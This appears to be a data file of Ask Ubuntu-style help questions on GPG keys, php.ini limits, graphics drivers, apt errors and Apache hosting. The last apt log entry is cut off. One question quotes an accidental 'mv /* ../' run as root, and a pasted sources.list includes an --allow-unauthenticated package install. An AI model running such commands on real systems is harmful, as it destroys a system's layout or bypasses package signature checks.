332019	revert moving root directory recursivelly	i have an ubuntu desktop used as a server . this morning i accidentally moved all my root to ../ root @ server : /tmp/ups/up/upsilon # mv /* ../ mv : impossibile spostare `` /dev '' in `` ../dev '' : dispositivo o risorsa occupata mv : impossibile spostare `` /proc '' in `` ../proc '' : dispositivo o risorsa occupata mv : impossibile spostare `` /run '' in `` ../run '' : dispositivo o risorsa occupata mv : impossibile spostare `` /sys '' in `` ../sys '' : dispositivo o risorsa occupata mv : impossibile spostare `` /tmp '' in una sottodirectory di săš stessa , `` ../tmp '' root @ server : /tmp/ups/up/upsilon # ls -bash : /bin/ls : no such file or directory i was connected remotely in ssh . now , i ca n't access anymore . i ca n't also view webmin . so , now i ca n't restart system correct ? and i must physically access to the system console and type this command : ../bin/mv ../ { bin , boot , etc , home , media , mnt , opt , root , sbin , selinux , usr , var , vmlinuz* } right ? where did my root directory go and how can i get it back ? will the above command work ?
332020	how do i import a private key into gpg so that it becomes the default key ?	i 'm trying to share a gnupg key pair by importing it into each machine . this is how i 'm doing it : gpg -- allow-secret-key-import -- import secret.gpg.key gpg -- import public.gpg.key the keys have been exported with -a . after doing this , the public key is shown correctly when i do a gpg -- list-keys , but the private key is n't ( gpg -- list-secret-keys ) . what am i doing wrong ? by the way : i 'm doing this with puppet , so any solution that does n't require me to type stuff in ( -- edit-key and the like ) would be appreciated .
332022	changes for upload_max_filesize , memory_limit & post_max_size in the php.ini are n't affect	i 'm trying to increase the upload_max_filesize etc in order to import bigger files with phpmyadmin . i have changed the php.ini and restart apache . i can see the changes on the phpmyadmin import screen ( mentioned there max : 300mib ) but when i try to import a 50 m file i 'm getting the alert : no data was received to import . either no file name was submitted , or the file size exceeded the maximum size permitted by your php configuration . see faq 1.16 . any idea how it can be : in 1 hand it seems the changes took affect but in the other hand it does n't work ... thank you very much .
332023	is there an ubuntu server ( or other text-only ) livecd ?	i need to test something on a fresh server install of ubuntu . only up to and including ubuntu-standard . i 'd rather not do a clean install and i 'd rather avoid chroot/lxc containers because i want to fire off some really harmful commands and i do n't want there to be any chance of nuking my main install . is there a small livecd or appliance disk available for this ?
332025	lightdm login screen disable mirroring	by default , on a dual monitor setup lightdm seems to mirror the monitors on login . is it possible to configure the lightdm so that it enables both monitors but only shows the login screen on one of them ?
332026	trying to install proprietory nvidia graphics drivers	after reading and trying many different suggestions for some hours , i returned to this how-to : https : //help.ubuntu.com/community/binarydriverhowto/nvidia the first problem i encounter is how to identify which of the listed drivers support my nvidia geforce 630m graphics card . following the links does n't really help , since it is not stated there either ( except where support for a new driver was added later which is explicitly stated , but the original devices covered are not ) . however , even if i knew , if it does n't appear in the 'additional drivers ' dialogue ( see below ) , how will i install it ? second issue : the article goes on to say that available drivers for my hardware are usually listed in 'additional drivers ' . in my case , they are n't . unfortunately , it does n't tell me how to correct that or work around it ? i 've checked the bios and there is no way offered there to disable the integrated graphics , only the nvidia graphics . i 've also tried each available option in this : $ sudo update-alternatives -- config i386-linux-gnu_gl_conf my system is an acer aspire 4752g bought may 2012 . i 'm running ubuntu 12.04lts . uname -a : 3.2.0-38-generic-pae # 61-ubuntu smp tue feb 19 12:39:51 utc 2013 i686 i686 i386 gnu/linux it 's 64bit hardware but i installed 32bit os for greater software compatibility . running $ sudo tail -fn 500 /var/log/xorg.0.log | grep ' ( ee ) ' returns '' ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 28.886 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) the reason for wanting the proprietor y drivers is because my laptop comes with 3d accelerated graphics adaptor and so rather than confining myself to struggling with the on-board graphics , i would rather use it . i also want to experiment with using it for bitmining ( which uses the gpu 's for computing power ) .
332028	error message that wo n't let me run package manager ... ( im new to ubuntu )	reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_universe_i18n_translation-en e : the package lists or status file could not be parsed or opened .
332032	i can not install any software on ubuntu 13.04	i 've recently installed ubuntu 13.04 and now , whenever i install any software i get this error : sudo apt-get install vlc dpkg : error : unable to create new file '/var/lib/dpkg/info/format-new ' : is a directory e : sub-process /usr/bin/dpkg returned an error code ( 2 )
332039	ubuntu 13.04 battery indicator issue	i have an hp pavilion g6 laptop with ubuntu 13.04 installed . recently i installed jupitor for ubuntu 13.04 and uninstalled in due to some issues . i do n't know whether it is the reason but now my battery indicator in ubuntu has gone crazy . when i plugged my laptop in , it indicates that the battery is low with red battery icon . when i unplugged , it shows battery is charging . i previously looked at this question but no answer found for my case . can anybody give me a solution . thank you .
332040	ubuntu 12.10 having issues	i 've recently started programming in university and for an os they gave us ubuntu 12.10 to code in . now i have quite an old laptop but still reliable , intel dual core , 4gb ddr2 , nvidia 6500gt ( i think need to check again ) . so one day when i boot ubuntu is shows me this window `` system is running in low graphics mode '' , i research it and apparently it 's because of an outdated graphics card driver . so i look and it tells me to use : sudo apt-get install nvidia-current so it installed and i thought it would be fine , this is where it all went to hell . the next time i booted , the launcher did n't start , the toolbar on the top was n't showing . only the desktop and my few work folders remained on the screen , there 's and only an error showed the first time `` compiz has failed to launch '' or something , i click launch again but it does n't do anything . i even tried uninstalling the drivers and installing one according to the os type ( got the idea from an answer here ) but it did n't change anything . i 'm desperately looking for a solution because there 's more assignments on the way and i need my laptop to work properly . i 've really enjoyed ubuntu thus far but this is scaring me from using it in the future , thanks in advance for the help : ) update : okay so i uninstalled the driver and its back to normal now , yay : d now there 's just the `` system running in low graphics mode '' , anyway to get rid of that ? i have to restart my laptop 2 - 5 times for it to boot up without that message , i 'm sure there 's a more elegant solution ? by the way thank you so much for the help : )
332041	'no boot disk has been detected or the disk has failed ' after using boot-repair ( windows 8/ubuntu dual-boot )	i 've recently bought a packard bell imedia s 2870 with windows 8 on . after manually installing ubuntu 13.04 ( 'something else ' option ) , the pc would boot straight to windows . i tried to reinstall the grub via chroot -- following instructions indicated in various forums : e.g . https : //help.ubuntu.com/community/grub2/installing # reinstalling_grub_2 ( but to no avail ) -- and then , after , using boot-repair -- i went for the reccomended repair settings -- , which generated the following url ( http : //paste.ubuntu.com/5978031/ ) and invited me to make my bios boot on the sda2/efi/ubuntu/shimx64.efi file . after rebooting , the error message in the subject line above appeared , and i was not able to set any such sda2/efi/ubuntu/shimx64.efi as the default boot device when i accessed the bios . i have had a look at similar threads without finding anything fit for purpose . any suggestions ? thanks
332042	linux copy command	for example i have two users a and b and a has admin privileges . i am logged in as b and i want to know how can i copy /etc/sudoers in b home directory in a single command and after /etc/sudoers is copied it must be owned by b user by default , without using chmod , chown . i hope i made myself clear .
332043	lircd works when run from command line , not when run from init.d/service	i 'm configuring a system for use as a media centre , running mythbuntu 12.04 . everything is working , short of the remote . i 've configured my remote , and it i start lirc from the command line , it works fine . if i run it from the init script service lirc start it does n't work . ( for this purpose , work means to have irw show an output ) . in both cases i 'm using exactly the same command ( in fact , for running it from the command line , i 'm just copying the command that is present in ps -ef ) . both cases have lirc running as root ( at least that 's what ps -ef tells me ) . both cases produce exactly the same info in syslog . command to start lirc : sudo /usr/sbin/lircd -- output=/var/run/lirc/lircd -- driver=devinput -- device=/dev/input/irremote syslog output ( start lirc , start irw , stop irw , kill lirc ) : aug 13 22:06:05 myth-fj lircd-0.9.0 [ 4917 ] : lircd ( devinput ) ready , using /var/run/lirc/lircd aug 13 22:06:05 myth-fj lircd-0.9.0 [ 4917 ] : accepted new client on /var/run/lirc/lircd aug 13 22:06:05 myth-fj lircd-0.9.0 [ 4917 ] : initializing '/dev/input/irremote' aug 13 22:06:28 myth-fj lircd-0.9.0 [ 4917 ] : accepted new client on /var/run/lirc/lircd aug 13 22:06:35 myth-fj lircd-0.9.0 [ 4917 ] : removed client aug 13 22:06:42 myth-fj lircd-0.9.0 [ 4917 ] : caught signal aug 13 22:06:42 myth-fj lircd-0.9.0 [ 4917 ] : closing '/dev/input/irremote' i 'm completely stumped .
332046	xfce windows drawing buggy	i just upgraded to raring , and accidentally installed proposed updates . now chrome and sublime text are not drawed correctly . i do n't know witch way i should look to fix it.. it can be proposed update or x update turned on in source.list .. here is my source.list # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # official ubuntu repos # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ubuntu main repos deb http : //sa.archive.ubuntu.com/ubuntu/ raring main restricted universe multiverse # # # # # # ubuntu update repos deb http : //sa.archive.ubuntu.com/ubuntu/ raring-security main restricted universe multiverse deb http : //sa.archive.ubuntu.com/ubuntu/ raring-updates main restricted universe multiverse # deb http : //sa.archive.ubuntu.com/ubuntu/ raring-proposed main restricted universe multiverse deb http : //sa.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse # # # # # # ubuntu partner repo deb http : //archive.canonical.com/ubuntu raring partner # # # # # # ubuntu extras repo deb http : //extras.ubuntu.com/ubuntu raring main # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # unofficial repos # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 3rd party binary repos # # # # banshee - https : //edge.launchpad.net/~banshee-team # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 6e80c6b7 deb http : //ppa.launchpad.net/banshee-team/ppa/ubuntu raring main # # # # dropbox - http : //dropbox.com # # run this command : sudo apt-key adv -- keyserver pgp.mit.edu -- recv-keys 5044912e deb http : //linux.dropbox.com/ubuntu/ raring main # # # # getdeb - http : //www.getdeb.net # # run this command : wget -q -o- http : //archive.getdeb.net/getdeb-archive.key | sudo apt-key add - deb http : //archive.getdeb.net/ubuntu raring-getdeb apps # # # # gimp ppa - https : //launchpad.net/~otto-kesselgulasch/+archive/gimp # # run this command : sudo apt-key adv -- recv-keys -- keyserver keyserver.ubuntu.com 614c4b38 deb http : //ppa.launchpad.net/otto-kesselgulasch/gimp/ubuntu raring main # # # # google chrome browser - http : //www.google.com/linuxrepositories/ # # run this command : wget -q https : //dl-ssl.google.com/linux/linux_signing_key.pub -o- | sudo apt-key add - deb http : //dl.google.com/linux/chrome/deb/ stable main # # # # google earth - http : //www.google.com/linuxrepositories/ # # run this command : wget -q https : //dl-ssl.google.com/linux/linux_signing_key.pub -o- | sudo apt-key add - deb http : //dl.google.com/linux/earth/deb/ stable main # # # # jdownloader ppa - https : //launchpad.net/~jd-team # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 6a68f637 deb http : //ppa.launchpad.net/jd-team/jdownloader/ubuntu raring main # # # # libreoffice - http : //www.documentfoundation.org/download/ # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 1378b444 deb http : //ppa.launchpad.net/libreoffice/ppa/ubuntu raring main # # # # medibuntu - http : //www.medibuntu.org/ # # run this command : sudo apt-get -- quiet update & & sudo apt-get -- yes -- quiet -- allow-unauthenticated install medibuntu-keyring & & sudo apt-get -- quiet update deb http : //packages.medibuntu.org/ raring free non-free # # # # oracle java ( jdk ) installer ppa - http : //www.webupd8.org/2012/01/install-oracle-java-jdk-7-in-ubuntu-via.html # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys eea14886 deb http : //ppa.launchpad.net/webupd8team/java/ubuntu raring main # # # # ubuntu tweak ppa - http : //ubuntu-tweak.com/ # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 0624a220 deb http : //ppa.launchpad.net/tualatrix/ubuntu raring main # # # # unetbootin - http : //unetbootin.sourceforge.net/ # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys fc91ae7e deb http : //ppa.launchpad.net/gezakovacs/ppa/ubuntu raring main # # # # x updates - https : //launchpad.net/~ubuntu-x-swat/+archive/x-updates/ # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys af1cdfa9 deb http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu raring main can you help ? edit : sudo lspci -v | grep -a10 vga 00:02.0 vga compatible controller : intel corporation mobile 945gse express integrated graphics controller ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 8340 flags : bus master , fast devsel , latency 0 , irq 16 memory at f7f00000 ( 32-bit , non-prefetchable ) [ size=512k ] i/o ports at dc00 [ size=8 ] memory at d0000000 ( 32-bit , prefetchable ) [ size=256m ] memory at f7ec0000 ( 32-bit , non-prefetchable ) [ size=256k ] expansion rom at [ disabled ] capabilities : [ 90 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 kernel driver in use : i915
332050	what steps are need to host a website on ubuntu using apache2 ?	i successfully run one website on apache2 using a tutorial . my second website , i ca n't reach locally , and i do n't know why . here are the steps i follow : copy my website to folder /data/mywebsite create symlink to /var/www/mywebsite configurate /etc/apache2/sites-available/mywebsite like this : < virtualhost *:80 > serveradmin me @ localhost.de servername localhost documentroot /var/www/mywebsite < directory /var/www/mywebsite > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > < /virtualhost > now i enable this page using apache2 and then restart apache2 sudo a2ensite mywebsite sudo service apache2 restart but instead of my page , i only see my www folder . i guess i linked something wrong . is it necessary to have this slash / behind mywebsite or something ? i tried everything that i can think of for some hours now . i also tried to run it on different port and adding a port to my apache2 ports.conf . still no success . any advice would be most helpful .
332053	asus n56v - instant key	is there a way to make the instant key of an asus n56v work under ubuntu/xubuntu ? i 'm using xubuntu 13.04 . i 'm trying to set a function for this instant key thru setting manager- > keyboard , but i 'm not able ( the key is not recognized ) . however , this is what i get using xev and pressing the instant key : keypress event , serial 37 , synthetic no , window 0x2200001 , root 0x9f , subw 0x0 , time 3698815 , ( 169 , -16 ) , root : ( 763,301 ) , state 0x0 , keycode 248 ( keysym 0x0 , nosymbol ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 37 , synthetic no , window 0x2200001 , root 0x9f , subw 0x0 , time 3698815 , ( 169 , -16 ) , root : ( 763,301 ) , state 0x0 , keycode 248 ( keysym 0x0 , nosymbol ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false how can i make it work ?
332058	how to avoid normal users from accessing others likewise home folder ?	how can i avoid normal users from accessing other users home folders ? all the users login via ad a/c but here in ubuntu 12.04 anyone can easily access other users home folder including administrator directory how am i able to avoid this happening ?
332060	not able to install g++	this is what i get when i run sudo apt-get install g++ : libgtksourceview-3.0-0 is already the newest version . libgconf-2-4 is already the newest version . ibus-gtk is already the newest version . libqtgui4 is already the newest version . libgssapi-krb5-2 is already the newest version . ubuntu-extras-keyring is already the newest version . libpam0g is already the newest version . libclutter-gtk-1.0-0 is already the newest version . libgpg-error0 is already the newest version . libdbusmenu-glib4 is already the newest version . gir1.2-atspi-2.0 is already the newest version . perl-modules is already the newest version . lightdm-remote-session-uccsconfigure is already the newest version . libcolorhug1 is already the newest version . gedit-common is already the newest version . libwebkitgtk-3.0-common is already the newest version . system-config-printer-gnome is already the newest version . libgcc-4.7-dev is already the newest version . libtelepathy-logger3 is already the newest version . fonts-tlwg-loma is already the newest version . account-plugin-yahoo is already the newest version . firefox-globalmenu is already the newest version . libgpod4 is already the newest version . libgail-3-0 is already the newest version . fonts-tlwg-umpush is already the newest version . xdg-user-dirs-gtk is already the newest version . libgudev-1.0-0 is already the newest version . libgtksourceview-3.0-common is already the newest version . apport-gtk is already the newest version . intel-gpu-tools is already the newest version . libcanberra-gtk-module is already the newest version . gnome-system-log is already the newest version . account-plugin-jabber is already the newest version . libproxy1-plugin-networkmanager is already the newest version . libgweather-3-1 is already the newest version . libdmapsharing-3.0-2 is already the newest version . gir1.2-soup-2.4 is already the newest version . language-selector-gnome is already the newest version . account-plugin-google is already the newest version . modemmanager is already the newest version . python-gi is already the newest version . libglib2.0-data is already the newest version . libgdk-pixbuf2.0-0 is already the newest version . xorg is already the newest version . fonts-lklug-sinhala is already the newest version . libtelepathy-glib0 is already the newest version . libgrip0 is already the newest version . libsignon-qt1 is already the newest version . ubuntu-settings is already the newest version . language-pack-gnome-en-base is already the newest version . zeitgeist-core is already the newest version . branding-ubuntu is already the newest version . gstreamer1.0-plugins-base is already the newest version . apg is already the newest version . thunderbird-globalmenu is already the newest version . gnome-icon-theme-symbolic is already the newest version . policykit-desktop-privileges is already the newest version . sgml-base is already the newest version . libdigest-hmac-perl is already the newest version . unity-scope-gdrive is already the newest version . libsignon-extension1 is already the newest version . gir1.2-totem-plparser-1.0 is already the newest version . session-migration is already the newest version . libunistring0 is already the newest version . libdbus-glib-1-2 is already the newest version . gir1.2-totem-1.0 is already the newest version . libgstreamer-plugins-good1.0-0 is already the newest version . manpages-dev is already the newest version . telepathy-gabble is already the newest version . grub-common is already the newest version . account-plugin-twitter is already the newest version . liblangtag-common is already the newest version . libgc1c3 is already the newest version . gedit is already the newest version . libgrail6 is already the newest version . xserver-xorg-core is already the newest version . libgdata13 is already the newest version . libgupnp-igd-1.0-4 is already the newest version . glib-networking is already the newest version . syslinux-legacy is already the newest version . gir1.2-packagekitglib-1.0 is already the newest version . libmagic1 is already the newest version . libgcr-3-common is already the newest version . signond is already the newest version . libgoa-1.0-0 is already the newest version . xserver-xorg-video-openchrome is already the newest version . libpam-xdg-support is already the newest version . ntfs-3g is already the newest version . libpulse-mainloop-glib0 is already the newest version . gir1.2-gst-plugins-base-1.0 is already the newest version . libwebkitgtk-3.0-0 is already the newest version . libelfg0 is already the newest version . activity-log-manager-control-center is already the newest version . xserver-xorg-video-vmware is already the newest version . gnome-contacts is already the newest version . libavahi-glib1 is already the newest version . python is already the newest version . gir1.2-dee-1.0 is already the newest version . rhythmbox-plugins is already the newest version . gettext is already the newest version . libfontconfig1 is already the newest version . xserver-xorg-input-wacom is already the newest version . libsemanage1 is already the newest version . systemd-services is already the newest version . grub-pc-bin is already the newest version . ssh-askpass-gnome is already the newest version . activity-log-manager-common is already the newest version . libxxf86dga1 is already the newest version . gnome-accessibility-themes is already the newest version . libogg0 is already the newest version . xserver-xorg-video-radeon is already the newest version . geoclue is already the newest version . libdpkg-perl is already the newest version . libsgutils2-2 is already the newest version . gvfs-backends is already the newest version . libqt4-svg is already the newest version . libgtop2-7 is already the newest version . xserver-xorg-video-qxl is already the newest version . gnome-control-center-data is already the newest version . gir1.2-javascriptcoregtk-3.0 is already the newest version . xserver-xorg-video-savage is already the newest version . libapt-pkg4.12 is already the newest version . xserver-xorg-video-fbdev is already the newest version . software-center is already the newest version . zeitgeist is already the newest version . libgstreamer-plugins-base0.10-0 is already the newest version . libgtk2.0-0 is already the newest version . libpolkit-agent-1-0 is already the newest version . libtag1-vanilla is already the newest version . xserver-xorg-input-evdev is already the newest version . gconf2-common is already the newest version . gir1.2-gnomebluetooth-1.0 is already the newest version . remmina-plugin-vnc is already the newest version . python3-gi is already the newest version . python3-xdg is already the newest version . gir1.2-atk-1.0 is already the newest version . gnome-keyring is already the newest version . libgnome-keyring-common is already the newest version . libgettextpo0 is already the newest version . gir1.2-networkmanager-1.0 is already the newest version . gcc-4.7 is already the newest version . gnome-mines is already the newest version . gir1.2-webkit-3.0 is already the newest version . python-aptdaemon.gtk3widgets is already the newest version . geoclue-ubuntu-geoip is already the newest version . ubuntu-sso-client-qt is already the newest version . zlib1g is already the newest version . libcloog-ppl1 is already the newest version . gnome-sudoku is already the newest version . xserver-xorg is already the newest version . libapt-pkg-perl is already the newest version . libcanberra-gtk3-module is already the newest version . gnome-font-viewer is already the newest version . libglu1-mesa is already the newest version . gsfonts is already the newest version . fonts-tlwg-purisa is already the newest version . xserver-xorg-video-all is already the newest version . update-manager-core is already the newest version . gir1.2-gmenu-3.0 is already the newest version . gstreamer1.0-tools is already the newest version . network-manager-pptp is already the newest version . python3-update-manager is already the newest version . manpages is already the newest version . policykit-1-gnome is already the newest version . libpython3.3-stdlib is already the newest version . pppconfig is already the newest version . libgcc1 is already the newest version . gtk3-engines-unico is already the newest version . gvfs-common is already the newest version . bluez-gstreamer is already the newest version . linux-image-3.8.0-19-generic is already the newest version . libneon27-gnutls is already the newest version . libgirepository-1.0-1 is already the newest version . libreoffice-gnome is already the newest version . gir1.2-gstreamer-1.0 is already the newest version . libgpgme11 is already the newest version . gir1.2-gst-plugins-base-0.10 is already the newest version . gnome-session-canberra is already the newest version . poppler-data is already the newest version . system-config-printer-udev is already the newest version . libasound2-plugins is already the newest version . libcogl-common is already the newest version . libcairo-gobject2 is already the newest version . gstreamer1.0-x is already the newest version . libmission-control-plugins0 is already the newest version . libgtk-3-0 is already the newest version . libcanberra-gtk3-0 is already the newest version . libgdata-common is already the newest version . xserver-xorg-input-synaptics is already the newest version . xserver-xorg-video-vesa is already the newest version . ubuntu-wallpapers-raring is already the newest version . lockfile-progs is already the newest version . gnome-menus is already the newest version . libglib-perl is already the newest version . libegl1-mesa-drivers is already the newest version . ubuntuone-control-panel-qt is already the newest version . gir1.2-messagingmenu-1.0 is already the newest version . libjpeg-turbo8 is already the newest version . logrotate is already the newest version . plymouth-theme-ubuntu-logo is already the newest version . gnome-session-common is already the newest version . libpam-gnome-keyring is already the newest version . ubuntuone-client-gnome is already the newest version . gnome-control-center is already the newest version . gsettings-desktop-schemas is already the newest version . gnome-calculator is already the newest version . gconf-service-backend is already the newest version . libpango1.0-0 is already the newest version . libjbig0 is already the newest version . xserver-xorg-video-sisusb is already the newest version . gir1.2-rb-3.0 is already the newest version . genisoimage is already the newest version . gnome-icon-theme is already the newest version . libupower-glib1 is already the newest version . libgeis1 is already the newest version . libgtk2.0-common is already the newest version . xserver-xorg-video-tdfx is already the newest version . libxcb-glx0 is already the newest version . libglapi-mesa is already the newest version . python-gobject-2 is already the newest version . guile-2.0-libs is already the newest version . fonts-tlwg-kinnari is already the newest version . dictionaries-common is already the newest version . libgs9 is already the newest version . gnome-session is already the newest version . libgstreamer1.0-0 is already the newest version . gir1.2-pango-1.0 is already the newest version . fonts-tlwg-typewriter is already the newest version . telepathy-logger is already the newest version . wget is already the newest version . libgl1-mesa-glx is already the newest version . gir1.2-gdata-0.0 is already the newest version . transmission-gtk is already the newest version . libdbusmenu-gtk3-4 is already the newest version . libgexiv2-2 is already the newest version . libgnome-menu-3-0 is already the newest version . gstreamer1.0-alsa is already the newest version . gstreamer1.0-clutter is already the newest version . libqt4-opengl is already the newest version . librsvg2-2 is already the newest version . gir1.2-gudev-1.0 is already the newest version . language-pack-en-base is already the newest version . libnm-gtk-common is already the newest version . gnome-orca is already the newest version . libgtk2-perl is already the newest version . gnome-bluetooth is already the newest version . libpoppler-glib8 is already the newest version . groff-base is already the newest version . thunderbird-gnome-support is already the newest version . gnupg is already the newest version . gir1.2-ebook-1.2 is already the newest version . xserver-xorg-video-cirrus is already the newest version . account-plugin-flickr is already the newest version . libaccounts-glib0 is already the newest version . libgmime-2.6-0 is already the newest version . libgail18 is already the newest version . xul-ext-websites-integration is already the newest version . account-plugin-windows-live is already the newest version . wireless-regdb is already the newest version . signon-plugin-password is already the newest version . gir1.2-notify-0.7 is already the newest version . libgutenprint2 is already the newest version . xserver-xorg-video-r128 is already the newest version . im-config is already the newest version . xdg-utils is already the newest version . unattended-upgrades is already the newest version . libgusb2 is already the newest version . ubuntu-release-upgrader-core is already the newest version . fonts-tlwg-typist is already the newest version . libgs9-common is already the newest version . grep is already the newest version . fonts-tlwg-garuda is already the newest version . gir1.2-edataserver-1.2 is already the newest version . glib-networking-services is already the newest version . libnl-genl-3-200 is already the newest version . libavahi-gobject0 is already the newest version . ghostscript-x is already the newest version . python3-gdbm is already the newest version . linux-image-generic is already the newest version . libqt4-designer is already the newest version . libxdamage1 is already the newest version . keyboard-configuration is already the newest version . xserver-xorg-video-neomagic is already the newest version . libmng1 is already the newest version . printer-driver-gutenprint is already the newest version . libgnomekbd-common is already the newest version . gvfs-libs is already the newest version . libgdk-pixbuf2.0-common is already the newest version . libcogl-pango12 is already the newest version . python-gnomekeyring is already the newest version . geoip-database is already the newest version . libjpeg8 is already the newest version . librsvg2-common is already the newest version . sessioninstaller is already the newest version . libcompizconfig0 is already the newest version . xdg-user-dirs is already the newest version . libgstreamer0.10-0 is already the newest version . gnome-disk-utility is already the newest version . xserver-xorg-video-modesetting is already the newest version . gir1.2-gtksource-3.0 is already the newest version . libsignon-plugins-common1 is already the newest version . libslang2 is already the newest version . unity-lens-shopping is already the newest version . libgeoclue0 is already the newest version . linux-headers-3.8.0-19-generic is already the newest version . libsemanage-common is already the newest version . libgck-1-0 is already the newest version . gucharmap is already the newest version . liblightdm-gobject-1-0 is already the newest version . libopenvg1-mesa is already the newest version . libgweather-common is already the newest version . libgail-common is already the newest version . xserver-xorg-video-nouveau is already the newest version . xfonts-encodings is already the newest version . libgtk-3-bin is already the newest version . gnome-terminal-data is already the newest version . libclutter-gst-2.0-0 is already the newest version . libgxps2 is already the newest version . fonts-tlwg-mono is already the newest version . mcp-account-manager-uoa is already the newest version . gconf-service is already the newest version . grub-gfxpayload-lists is already the newest version . gir1.2-accounts-1.0 is already the newest version . libpangomm-1.4-1 is already the newest version . python-gtk2 is already the newest version . e2fsprogs is already the newest version . python-gi-cairo is already the newest version . libpaper1 is already the newest version . python-gobject is already the newest version . libsigc++-2.0-0c2a is already the newest version . libnm-gtk0 is already the newest version . gvfs is already the newest version . libglib2.0-bin is already the newest version . libglibmm-2.4-1c2a is already the newest version . printer-driver-sag-gdi is already the newest version . gnomine is already the newest version . libgnutls26 is already the newest version . xserver-xorg-video-mga is already the newest version . libgpm2 is already the newest version . python3-distupgrade is already the newest version . gstreamer1.0-nice is already the newest version . gzip is already the newest version . dpkg is already the newest version . grub-pc is already the newest version . gstreamer1.0-plugins-base-apps is already the newest version . thin-client-config-agent is already the newest version . pkg-config is already the newest version . overlay-scrollbar-gtk3 is already the newest version . overlay-scrollbar-gtk2 is already the newest version . gnome-mahjongg is already the newest version . appmenu-gtk is already the newest version . firefox-gnome-support is already the newest version . liblocale-gettext-perl is already the newest version . ubuntu-keyring is already the newest version . libsignon-glib1 is already the newest version . glib-networking-common is already the newest version . libcanberra-gtk0 is already the newest version . gir1.2-freedesktop is already the newest version . software-center-aptdaemon-plugins is already the newest version . gstreamer0.10-pulseaudio is already the newest version . libcap-ng0 is already the newest version . gir1.2-wnck-3.0 is already the newest version . gir1.2-signon-1.0 is already the newest version . libproxy1-plugin-gsettings is already the newest version . totem-plugins is already the newest version . gnome-user-share is already the newest version . gir1.2-glib-2.0 is already the newest version . gcr is already the newest version . gcc is already the newest version . ghostscript is already the newest version . python-xdg is already the newest version . xserver-xorg-video-s3 is already the newest version . dialog is already the newest version . lightdm is already the newest version . appmenu-gtk3 is already the newest version . iputils-ping is already the newest version . signon-keyring-extension is already the newest version . python-ubuntuone-storageprotocol is already the newest version . xserver-xorg-video-trident is already the newest version . libgettextpo-dev is already the newest version . libgssapi3-heimdal is already the newest version . python-zeitgeist is already the newest version . libwmf0.2-7-gtk is already the newest version . xserver-xorg-video-intel is already the newest version . perl is already the newest version . gir1.2-gstreamer-0.10 is already the newest version . libcogl12 is already the newest version . indicator-messages is already the newest version . libreoffice-ogltrans is already the newest version . system-config-printer-common is already the newest version . fonts-thai-tlwg is already the newest version . xserver-xorg-video-mach64 is already the newest version . libnm-glib4 is already the newest version . network-manager is already the newest version . libcupscgi1 is already the newest version . libgtkmm-3.0-1 is already the newest version . libfftw3-single3 is already the newest version . gnome-desktop3-data is already the newest version . language-pack-gnome-en is already the newest version . libzeitgeist-1.0-1 is already the newest version . gnome-screensaver is already the newest version . gir1.2-unity-5.0 is already the newest version . fonts-tlwg-norasi is already the newest version . libtag1c2a is already the newest version . libjbig2dec0 is already the newest version . gkbd-capplet is already the newest version . libgphoto2-2 is already the newest version . python3-pkg-resources is already the newest version . gstreamer0.10-gconf is already the newest version . python-imaging is already the newest version . rhythmbox-plugin-magnatune is already the newest version . gcc-4.7-base is already the newest version . python-debtagshw is already the newest version . libgnome-bluetooth11 is already the newest version . gnome-control-center-unity is already the newest version . libgupnp-1.0-4 is already the newest version . gconf2 is already the newest version . python3-gi-cairo is already the newest version . fonts-takao-pgothic is already the newest version . account-plugin-aim is already the newest version . libgoa-1.0-common is already the newest version . gstreamer0.10-plugins-base is already the newest version . libgphoto2-l10n is already the newest version . libgstreamer-plugins-base1.0-0 is already the newest version . libdbusmenu-gtk4 is already the newest version . libpackagekit-glib2-14 is already the newest version . libgnome-keyring0 is already the newest version . xserver-xorg-input-all is already the newest version . network-manager-pptp-gnome is already the newest version . fontconfig-config is already the newest version . libwpg-0.2-2 is already the newest version . libegl1-mesa is already the newest version . signon-ui is already the newest version . dconf-gsettings-backend is already the newest version . gir1.2-gdkpixbuf-2.0 is already the newest version . linux-generic is already the newest version . xserver-xorg-input-mouse is already the newest version . remmina-plugin-rdp is already the newest version . light-themes is already the newest version . libfreerdp-plugins-standard is already the newest version . libparse-debianchangelog-perl is already the newest version . libgtk2.0-bin is already the newest version . firefox is already the newest version . libreoffice-gtk is already the newest version . fonts-tlwg-sawasdee is already the newest version . linux-headers-generic is already the newest version . gnome-control-center-signon is already the newest version . libpython2.7-stdlib is already the newest version . libglewmx1.8 is already the newest version . libaccount-plugin-1.0-0 is already the newest version . libc6 is already the newest version . language-selector-common is already the newest version . ghostscript-cups is already the newest version . gir1.2-dbusmenu-glib-0.4 is already the newest version . rhythmbox-plugin-zeitgeist is already the newest version . gvfs-daemons is 